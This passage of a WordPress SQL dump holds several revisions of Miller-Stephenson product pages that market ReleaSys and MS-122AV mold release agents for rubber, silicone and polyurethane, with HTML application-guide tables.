transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-07 13:33:59', '2016-11-07 13:33:59', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2916, 3, '2016-11-07 13:38:07', '2016-11-07 13:38:07', '<h1 style="text-align: justify;">Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys: Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-07 13:38:07', '2016-11-07 13:38:07', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2917, 3, '2016-11-07 14:05:10', '2016-11-07 14:05:10', '<h1 style="text-align: justify;">Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-07 14:05:10', '2016-11-07 14:05:10', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2918, 3, '2016-11-07 14:06:52', '2016-11-07 14:06:52', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless 